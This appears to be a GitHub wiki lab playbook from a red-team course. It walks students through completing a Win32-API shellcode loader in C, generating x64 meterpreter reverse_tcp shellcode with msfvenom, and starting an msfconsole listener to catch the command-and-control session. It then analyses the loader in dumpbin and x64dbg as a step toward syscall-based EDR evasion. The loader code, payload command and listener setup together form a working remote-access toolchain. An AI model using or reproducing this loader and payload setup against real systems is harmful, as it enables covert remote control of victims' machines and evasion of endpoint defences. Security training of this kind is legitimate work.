-
-
Notifications
You must be signed in to change notification settings - Fork 94
08: Chapter 4 | LAB Exercise Playbook
In this exercise we will create our first shellcode loader based on Win32 APIs (high level APIs). This loader will be our reference for further development into a direct syscall and indirect syscall loader.
The code template for this tutorial can be found here.
Task Nr. | Task Description |
---|---|
1 | Download the Win32-API Loader POC for this chapter. |
2 | The code in the POC is partially complete. Following the instructions in this playbook, the student's task is to complete the code. They must use the code provided for the four Windows APIs and place them in the correct order in the code. |
3 | Then you have to create the meterpreter shellcode, paste it into the loader and compile the loader. |
4 | Create and run a staged x64 meterpreter listener using msfconsole. |
5 | Run your compiled .exe and check that a stable command and control channel opens. |
Task Nr. | Task Description |
---|---|
6 | Use the Visual Studio dumpbin tool to analyse the Win32-API Loader. Are any Win32 APIs being imported from kernel32.dll? Is the result what you expected? |
7 | Use x64dbg to debug or analyse the Win32-API Loader.
|
The technical functionality of the Win32 API loader is relatively simple and therefore, in my opinion, perfect for rewriting the Win32 API loader step by step into a low level loader using direct or indirect system calls. The code for the Win32 API loader works like this.
First, we need to define the thread function ExecuteShellcode
which is later needed in the code for executing our shellcode. A thread function is a function that is executed when a new thread is started. In Windows, when a new thread is created using CreateThread
, it expects a pointer to a function. This function, which we can refer to as the "thread function", is the starting address of the code (our shellcode) that will be executed in the new thread.
// Define the thread function for executing shellcode
// This function will be executed in a separate thread created later in the main function
DWORD WINAPI ExecuteShellcode(LPVOID lpParam) {
// Create a function pointer called 'shellcode' and initialize it with the address of the shellcode
void (*shellcode)() = (void (*)())lpParam;
// Call the shellcode function using the function pointer
shellcode();
// Return 0 as the thread exit code
return 0;
}
Within the main function, the variable code
is defined, which is responsible for storing the meterpreter shellcode. The content of code
is stored in the .text
(code) section of the PE structure or, if the shellcode is larger than 255 bytes
, the shellcode is stored in the .rdata
section.
// Insert the Meterpreter shellcode as an array of unsigned chars (replace the placeholder with actual shellcode)
unsigned char code[] = "\xfc\x48\x83...";
The VirtualAlloc
Win32 API is used to reserve, commit, or change the state of a region of pages in the virtual address space of the calling process. This code block defines the function pointer void
, which points to the variable exec
and stores the return
address of the allocated memory using the Windows API VirtualAlloc
. For more details about the API or arguments, parameters, etc., see the official Microsoft documentation.
// Allocate Virtual Memory with PAGE_EXECUTE_READWRITE permissions to store the shellcode
// 'exec' will hold the base address of the allocated memory region
void* exec = VirtualAlloc(0, sizeof(code), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
The WriteProcessMemory
function provided by the Windows API writes data to an area of memory in a specified process. The entire area to be written must be accessible (allocated memory, which in our case was previously done by using VirtualAlloc
), and attempts to write to inaccessible memory will result in an error. Using WriteProcessMemory
copies the meterpreter shellcode into the allocated or committed memory. For more details about the API or arguments, parameters, etc., see the official Microsoft documentation.
// Copy the shellcode into the allocated memory region using WriteProcessMemory
SIZE_T bytesWritten;
WriteProcessMemory(GetCurrentProcess(), exec, code, sizeof(code), &bytesWritten);
The Win32 CreateThread
API allows you to create a new thread of execution within your process. In our case, we are using this API to run our shellcode in a new thread rather than in the main thread. For more details about the API or arguments, parameters, etc., see the official Microsoft documentation.
// Create a new thread to execute the shellcode
// Pass the address of the ExecuteShellcode function as the thread function, and 'exec' as its parameter
// The returned handle of the created thread is stored in hThread
HANDLE hThread = CreateThread(NULL, 0, ExecuteShellcode, exec, 0, NULL);
And by using the Windows API WaitForSingleObject
, we ensure that the shellcode thread completes its execution before the main thread exits. With WaitForSingleObject
, the shellcode would still be executed correctly, but when the main thread exits and returns from main(), the process itself may exit, killing all threads that are still running. This includes the shellcode thread, which would be abruptly terminated even if it had not finished executing. This is why WaitForSingleObject
is important and necessary. For more details about the API or arguments, parameters, etc., see the official Microsoft documentation
// Wait for the shellcode execution thread to finish executing
// This ensures the main thread doesn't exit before the shellcode has finished running
WaitForSingleObject(hThread, INFINITE);
Your task now is to complete the Win32 API loader POC by using the following code for the required Windows APIs. Remember that a correct order is required, allocate memory, copy shellcode into memory, execute in a new thread, and wait to exit the main thread until the new thread has been created.
Code
// Create a new thread to execute the shellcode
// Pass the address of the ExecuteShellcode function as the thread function, and 'exec' as its parameter
// The returned handle of the created thread is stored in hThread
HANDLE hThread = CreateThread(NULL, 0, ExecuteShellcode, exec, 0, NULL);
// Copy the shellcode into the allocated memory region using WriteProcessMemory
SIZE_T bytesWritten;
WriteProcessMemory(GetCurrentProcess(), exec, code, sizeof(code), &bytesWritten);
// Allocate Virtual Memory with PAGE_EXECUTE_READWRITE permissions to store the shellcode
// 'exec' will hold the base address of the allocated memory region
void* exec = VirtualAlloc(0, sizeof(code), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
// Wait for the shellcode execution thread to finish executing
// This ensures the main thread doesn't exit before the shellcode has finished running
WaitForSingleObject(hThread, INFINITE);
In this step, we will create our meterpreter shellcode for the Win32-API Loader with msfvenom in Kali Linux. To do this, we will use the following command and create x64 staged meterpreter shellcode.
kali>
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=IPv4_Redirector_or_IPv4_Kali LPORT=80 -f c > /tmp/shellcode.txt
The shellcode can then be copied into the Win32-API Loader POC by replacing the placeholder at the unsigned char, and the POC can be compiled as an x64 release.
Before we test the functionality of our Win32-API Loader, we need to create a listener within msfconsole.
kali>
msfconsole
msf>
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost IPv4_Redirector_or_IPv4_Kali
set lport 80
set exitonsession false
run
Once the listener has been successfully started, you can run your compiled Win32-API Loader. If all goes well, you should see an incoming command and control session.
The Visual Studio tool dumpbin can be used to check which Windows APIs are imported via kernel32.dll
. The following command can be used to check the imports. Which results do you expect?
cmd>
cd C:\Program Files (x86)\Microsoft Visual Studio\2019\Community
dumpbin /imports Win32-API.exe
Results
In the case of the Win32-API Loader, you should see that the Windows APIs VirtualAlloc, WriteProcessMemory, CreateThread and WaitForSingleObject are correctly imported into the Win32-API Loader from the kernel32.dll.
The first step is to run your Win32-API Loader, check that the .exe is running and that a stable meterpreter C2 channel is open. Then we open x64dbg and attach to the running process, note that if you open the Win32-API Loader directly in x64dbg you need to run the assembly first.
Then we want to check which APIs (Win32 or Native) or if the correct APIs are being imported and from which module or memory location. Remember that no direct syscalls or similar are used in the Win32-API Loader. What results do you expect?
Results
Checking the imported symbols in our Win32-API Loader, we should see that the Win32 APIs VirtualAlloc
, WriteProcessMemory
, CreateThread
and WaitForSingleObject
are imported from kernel32.dll
. So the result is the same as with dumpbin and seems to be valid.
We also want to check from which module or memory location the syscall stub
of the native functions used is implemented, and also check from which module or memory location the syscall
statement and return
statement are executed.
Results
We use the "Follow imported address" function in the Symbols tab by right-clicking on one of the four Win32 APIs used, e.g. VirtualAlloc
, and we can see that we jump to the location of kernel32.dll
.
In the next step we use the function "Follow in Dissassembler" to follow the memory address that jumps to the memory of the kernelbase.dll
.
Then we use the Follow in dissassembler function again and follow the address that calls the native function Nt*
or ZwAllocateVirtualMemory
from a memory location in ntdll.dll
.
As expected, we go the normal way via malware.exe
-> kernel32.dll
-> kernelbase.dll
-> ntdll.dll
-> syscall
. The following illustration shows, that the syscall
instruction and the return
instruction are executed from a memory region in ntdll.dll
as expected.
At the very least, we want to identify the meterpreter shellcode in the .text
section of the shellcode loader. To do this, have a look at the dissassembled code of Win32API-Loader.exe.
Results
By using the "Follow in Disassembler" on the loader module, we can jump to the disassembled code from the shellcode loader. In my case, at the very top we can identify the meterpreter shellcode. As long as your shellcode size is less than or equal to 255 bytes
, you will find the shellcode in the .text
section of the shellcode loader. If the shellcode size is greater than 255 bytes
, the shellcode will be stored in the .rdata
section of the loader.
- Syscall execution via normal transition from
Win32-API Loader.exe
->kernel32.dll
->kernelbase.dll
->ntdll.dll
->syscall
- Win32-API Loader imports Windows APIs from
kernel32.dll
... - ...then accesses or imports the native functions from
ntdll.dll
... - ...and finally executes the code of the corresponding native function, including the syscall instruction.
- If an EDR uses user mode hooking in
kernel32.dll
orntdll.dll
, the contents ofmalware.exe
are redirected to the EDR'shooking.dll
.